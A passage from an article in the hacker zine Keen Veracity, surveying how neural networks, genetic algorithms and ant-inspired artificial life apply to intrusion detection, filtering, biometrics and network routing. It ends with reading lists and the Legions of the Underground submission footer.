unreliable, unscalable, is prone to alot of false positives and also pretty much static providing little in the way of adaptability. NN's on the other hand "model" behaviour and use pattern recognition, allowing for a flexible, adaptive approach. One example is a user-monitoring agent which models users behaviour over a time period. Once it is trained, it can be implemented to monitor users behaviour, and if what the NN deems as normal behaviour deviates from the norm, it can be used to react as defined by a custom rule set. A number of papers have been published on this type of application: http://www.cs.rpi.edu/~brancj/publications/ryan98intrusion.pdf In fact, googling for the terms displays a massive array of hits: http://www.google.com/search?hl=en&ie=UTF-8&q=neural+networks+intrusion+detection&btnG=Google+Search The same applies to network traffic. Instead of a signature based approach, "normal" network activity can be fed into the NN and then monitored, once again for deviation from what the NN believes to be "normal" network traffic. One company currently working on this approach (and actually to market an NN based IDS product are Imagination Engines (http://www.imagination-engines.com/applications/ids.htm). Industry BigNames such as Cisco, ISS, Stonegate and almost any corporation involved in Networking/Security are actively involved in this sort of research. Another area that has shown interest in NN's for pattern recognition is Image/Content filtering. There are a number of NN based solutions already commercially available, F4i Image recognition (from first4internet.co.u) is an application have first hand experience with. It scans images in emails for pornographic content. It is amazingly precise and has a very low false-positive rate ( > 1% ). Other applications are antivirus/anti-malware and email/web traffic content filtering (www.surfcontrol.com uses a NN approach for example). NN’s have also become very important in the fight against the tidal wave of spam we are now receiving. A recent article on www.generation5.org (generation5 refers to the current generation of AI), which was also featured on SlashDot even included sample code (albeit in C#.....) (http://www.generation5.org/content/2004/KillSpam.asp) and googling for related whitepapers once again gives you years of reading material. Biometrics also make extensive use of NN's, especially their ability for pattern recognition and the creation of modelled maps. Fingerprint ID, Face ID and Voice recog. systems often use NN's for the actual identification process, as these, as mentioned before, have an uncanny ability to recognize patterns instead of static attributes. This helps in cases where some features might slightly change due to external circumstances, for example holding the finger slightly off-angle, or having a swollen cheek due to toothache. I have on associate who is working on a NN based project which learns the rhythm with which users type their passwords. It works a treat, has an accuracy of 93% and isn’t even fully developed. The main abilities of NN's, Pattern recognition, also make it interesting for another real-world application, namely data-mining. With the vast amount of information available from various sources (including other NN based approaches such as NN based IDS's) there is also a need to evaluate said data. Even here, AI related methods are showing vast potential (and are used in practical applications in many cases). Data mining based on bayes, markov models, NN’s and other MBL based approaches are beginning to help keep the GB’s of data manageable. Genetic algorithms are also helping to form the security applications of the future. GA’s, as the name implies, use methods based on evolution to generate the best approaches to solve problems. Let’s say you are looking for the best solution to solve a problem. You whack 20000 random programs into a virtual test-tube (i.e., computer memory), define certain criteria these have to achieve, and let it run. The _fittest_ programs (i.e. the ones closest to achieving the set goals) are then taken, multiplied to 20000 again, this time, some of these are _bred_ with one another. This means that certain parts are exchanged (like when the sperm and egg cell are combined, genes are taken from both) and a bit of random mutation is added. This is repeated for several thousand generations until (hopefully) the best solution to the problem evolves. There are numerous think tanks working on using this approach, as it can be applied to many problems. The actual results (i.e. the problem solved, which can range from recognizing intrusions, to encryption) are impressive, but the process also creates another factor that needs consideration from a security point of view. Auditing code which was generated this way can be quite daunting. Remember, it wasn’t generated per se by a human programmer, but evolved according to quite lose criteria. The resulting source can seem illogical and confusing. Although this means that an attacker has a harder time finding bugs, the same can be said of security auditors. Thankfully, the same methods can be applied to try and break the code as well, i.e. stress and penetration testing of computer generated code by computer generated code. Last but not least, we will mention Artificial Life. This is another related discipline to AI, one that doesn’t strive to create intelligence as such, but rather alive seeming agents. Most are modelled on living organisms, one reason for the fields name. Now you might (Still? - Ed.)be scratching your head and wondering _what the hell does that have to do with _InfoSec_, and once again, I will open your eyes. One real-world application is the use of a process modelled after Ants. You heard right, Ants (Not Antz - Ed.). The application is Network Routing. Ants are very dumb (compared to what? - Ed.), in fact, an individual Ant only has a few responses to any given situation. Ants also possess only local knowledge. Despite popular belief, an Ant Queen isn’t any smarter, It just lays eggs. But through some form of natural magic, ants are doing incredibly well. For Network specialists, three aspects of ant behaviour are interesting (reproducing,reproducing,reproducing - Ed.). The fact that they always find the shortest route to a food source collectively, the fact that ants don’t have traffic jams and the way in which ant nests regulate what each worker does. Both are related to pheromone usage and local observation. If an ant nest finds a source of food, a lot of worker ants are put to work to harvest this food. Every time an ant walks down a path, it leaves a pheromone trail which slowly gets weaker and weaker. Ants tend to follow the strongest trail, so the shortest path will have the strongest residue. After a while, all ants use that path. It’s a beautiful example of how nature regulates certain processes without a central control unit. Resource management is also done via a simple method. As an ant has no means of global communication, it can act only on local impulses. If an ant goes out of the nest and sees 7 other ants gathering food, and 3 tending to larvae, it will join the larvae tending ants. It basically assumes that it should be doing that due to what it has observed. The pheromone system also adds another interesting factor, especially for the security side of things. Ants of the same colony recognize each other by the pheromones they produce. This system is being researched to mark network internal packet traffic. Having to hack your way through semi-autonomous agents, marked with system internal ID’s that react dynamically to intrusions, based on computer generated code will change the face of computer security. The implications for network routing, and network management should be plain to see, so plain in fact, that it is a very common research topic (http://mars.elcom.nitech.ac.jp/~matsuo/SNPD01-2.pdf http://dsp.jpl.nasa.gov/members/payman/swarm/bonabeau98-iata.pdf (NASA) http://www.businessweek.com/1997/25/b353218.htm (british telecom) http://portal.acm.org/citation.cfm?id=993020&dl=ACM&coll=portal&CFID=11111111&CFTOKEN=2222222 (cisco) ) Modelling natural biological behaviour is a perfect method of solving common problems. Mother nature has had millions of years to perfect its creatures, and has come up with diverse and varied effective strategies to overcome many problems. Other natural behaviours are also being studied, Predator/Prey behaviour, Bird Flocking behaviour, the list goes on and on. Because most of these behaviours derive from very simple rules, and aren’t controlled centrally or organised, they are referred to as _bottom up_ approaches and belong to the discipline of emergence. Remember that term, emergence. It will play a big role in the future, especially of networks. I hope this article has given a broad overview of what the future holds, and why anyone interested in Computer Security should be interested in the field of Artificial Intelligence/Life. We will have to take notice of all this soon anyway, the contact with these methods unavoidable, and it is always better to be prepared. Links: www.ai-depot.com www.generation5.org www.cs.washington.edu/ai/ www.ai.mit.edu http://yaraslov.hopto.org/ai www.cognews.com http://planning.jpl.nasa.gov Books: Ray Kurzweil, The age of spiritual machines Roger Penrose, The emperors new mind Deborah Gordon, Ants at work Stephen Johnson, Emergence, the connected lives of Ants, Brains, Cities and Software Stuart .J.Russel, Artificial Intelligence, A modern Approach Kevin Gurney, Introduction to Neural Networks Steven Levy, Artificial Life Mark Ward, Virtual Organisms -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- S U B M I T T O K E E N V E R A C I T Y -------------------------------------------------------------------------------- NO! You do not have to be a member of Legions of the Underground to submit to KV. You can be a member of something else! Nobody is perfect (with the exception of the editor ofcourse - A.)! If you have a idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudice in any way shape or form, so even a AOLer's article may be published (_MAY_ not _WILL_ - A.) if it seems that it has clue. Or then again, maybe hell will freeze over! Anyones stuff maybe published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is a equal opportunity destroyer (of systems and great walls alike). -------------------------------------------------------------------------------- All submissions to: submit-kv@legions.org -------------------------------------------------------------------------------- IRC: Undernet #legions MUD: Sensenet.legions.org 5555 - The Best in Star Wars Reality Mudding -------------------------------------------------------------------------------- O F T E N I M I T A T E D N E V E R D U P L I C A T E D -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____|[] \_____/[] \_____/[] z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": www.legions.org z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* -------------------------------------------------------------------------------- All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2004 legions.org, all human rights reserved outside the US. --------------------------------------------------------------------------------